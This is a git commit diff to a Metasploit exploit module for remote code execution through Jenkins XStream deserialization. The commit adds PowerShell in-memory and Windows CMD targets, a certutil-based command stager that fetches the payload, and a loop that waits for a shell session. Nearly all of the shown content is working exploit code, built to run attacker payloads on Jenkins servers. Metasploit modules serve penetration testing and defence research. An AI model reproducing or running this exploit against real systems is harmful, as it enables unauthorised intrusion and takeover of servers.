Land #9423, PSH for jenkins_xstream_deserialize

2018-03-26 17:09:16 -05:00 · 2018-03-26 17:09:16 -05:00 · c19fc4c18f
parent 862a3ff74d 2939695991
commit c19fc4c18f
1 changed files with 39 additions and 4 deletions
--- a/modules/exploits/multi/http/jenkins_xstream_deserialize.rb
+++ b/modules/exploits/multi/http/jenkins_xstream_deserialize.rb
@ -43,6 +43,20 @@ class MetasploitModule < Msf::Exploit::Remote
          'Platform'   => 'python',
          'Arch'       => ARCH_PYTHON
        ],
+        ['PowerShell (In-Memory)',
+          'Platform'   => 'win',
+          'Arch'       => [ARCH_X86, ARCH_X64]
+        ],
+        ['Windows (CMD)',
+          'Platform'   => 'win',
+          'Arch'       => [ARCH_CMD],
+          'Payload' => {
+            'Compat'     => {
+              'PayloadType' => 'cmd',
+              'RequiredCmd' => 'adduser, generic'
+            }
+          }
+        ],
        ['Linux (Dropper)',
          'Platform'   => 'linux',
          'Arch'       => [ARCH_X86, ARCH_X64]
@ -57,6 +71,7 @@ class MetasploitModule < Msf::Exploit::Remote

    register_options([
      OptString.new('TARGETURI', [true, 'The base path to Jenkins', '/']),
+      OptString.new('PSH_PATH', [false, 'Path to powershell.exe', '']),
      Opt::RPORT('8080')
    ])
    deregister_options('URIPATH')
@ -82,23 +97,29 @@ class MetasploitModule < Msf::Exploit::Remote

  def exploit
    case target.name
-    when /Unix/, /Python/
+    when /Unix/, /Python/, /CMD/
      execute_command(payload.encoded)
+    when /PowerShell/
+      execute_command(payload.encoded)
+      wait_for_session
    else
-      execute_cmdstager
+      execute_cmdstager({:flavor => :certutil})
+      wait_for_session
    end
  end

  # Exploit methods
-
  def execute_command(cmd, opts = {})
    cmd = case target.name
    when /Unix/, /Linux/
      %W{/bin/sh -c #{cmd}}
    when /Python/
      %W{python -c #{cmd}}
-    when /Windows/
+    when /Windows/, /CMD/
      %W{cmd.exe /c #{cmd}}
+    when /PowerShell/
+      psh_opts = { :remove_comspec => true, :wrap_double_quotes => true }
+      %W{cmd.exe /c #{cmd_psh_payload(cmd, payload_instance.arch.first, psh_opts)}}
    end

    # Encode each command argument with XML entities
@ -113,6 +134,20 @@ class MetasploitModule < Msf::Exploit::Remote
    )
  end

+  def wait_for_session
+    print_status "Waiting for exploit to complete..."
+    begin
+      Timeout.timeout(datastore['ListenerTimeout']) do
+        loop do
+          break if session_created?
+          Rex.sleep(0.25)
+        end
+      end
+    rescue ::Timeout::Error
+      fail_with(Failure::Unknown, "Timeout waiting for exploit to complete")
+    end
+  end
+
  def xstream_payload(cmd)
    <<EOF
 <map>